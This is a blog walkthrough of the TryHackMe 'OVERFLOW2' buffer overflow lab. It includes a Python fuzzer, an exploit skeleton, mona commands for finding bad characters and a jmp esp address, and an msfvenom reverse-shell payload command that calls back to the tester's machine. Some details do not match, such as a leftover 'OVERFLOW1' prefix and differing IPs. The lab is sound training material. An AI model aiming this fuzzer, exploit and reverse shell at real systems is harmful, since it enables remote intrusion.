top of page
  • BlueDolphin

Try Hack Me Buffer Overflow 2


Configure Mona

- Prepare our environment and temp folder


Crash the application

- We will use a standard fuzzing script for this that will pass different buffer sizes.


Find the exact off set of the crash

- Find the particular memory address the crash occurred (data lands outside the buffer here and fills EIP with Junk)


Find Bad Characters

- Find and test character array to remove bad characters


Control EIP

- Fill the EIP register with custom input


Find JMP address

- Find a memory address with a jmp retn instruction we can control


Payload Generation

Configure Mona

Here we set out temporary folder within mona which will store a byte array for us at the later stage of this process.

!mona config -set workingfolder c:\mona\%p

Crash the application

We start off as usual with a standard windows binary fuzzing script and set the ip and port variables to the target server running the vulnerable service. In this case the binary is titled "OVERFLOW2".

python3 fuzzer.py
#!/usr/bin/env python3

import socket, time, sys

ip = "10.10.191.67"

port = 1337
timeout = 5
prefix = "OVERFLOW2 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)

Run the python scrip

oot@ip-10-10-58-73:~# python3 fuzz.py 
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing with 700 bytes
Fuzzing crashed at 700 bytes

We have a crash at 700 bytes of data passed into the buffer. This tells us the application is vulnerable to a buffer overflow.


Find the exact off set of the crash

First we setup a standard skeleton script for a buffer overflow exploit, to send data and call the shell.

import socket

ip = "10.10.44.191"
port = 1337

prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
  s.connect((ip, port))
  print("Sending evil buffer...")
  s.send(bytes(buffer + "\r\n", "latin-1"))
  print("Done!")
except:
  print("Could not connect.")

The next step is to create a character pattern. Pass the pattern of characters into the payload field of the exploit, restart OSCP in immunity and run the exploit.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1100

This offset value will be displayed in the EIP register and we will add this to our exploit script under "offset".


Find bad characters

We will generate an array of all possible bytes in mona and redirect this to the temporary file we configured.

!mona bytearray -b "\x00"

From here we generate a large byte array in the terminal that we can copy into the exploit under "payload"

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()


!mona compare -f C:\mona\oscp\bytearray.bin -a 01A2FA30


Im going to guess every second character and see if I can skip this manual process. Often when a bad character is flagged it will result in the next byte pair being associated and flagged. So every second byte pair is likely our bad character.


The selected bad cahracters are

00 23 3c 83 ba


\x00\xba\x83\x3c\x23


Control EIP

We need to test EIP by placing BBBB in the return address of the script which will be called after the buffer overflow ending at offset 634.



Find JMP

We will use the following command in mona to look for all jump esp instructions. Make sure to specify all bad instructions. Choose any of these of the jump points

!mona jmp -r esp -cpb "\x00\xba\x83\x3c\x23"

From here we look at the Log view and see several memory addresses with the jmp instruction.


0x625011af

Reverse this address to fit little Endian


\xaf\x11\x50\x62

Set return address
Taking the jmp esp address we insert this into the exploit as the retn address. 

The address must be translated to little endian however.


\xaf\x11\x50\x62

Payload generation
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.7.68 LPORT=4444 EXITFUNC=thread -b "\x00\xba\x83\x3c\x23" -f c

We add the shell code to our payload to replace the bad char array.


Launching the exploit gets us shell!

38 views0 comments

Commenti


bottom of page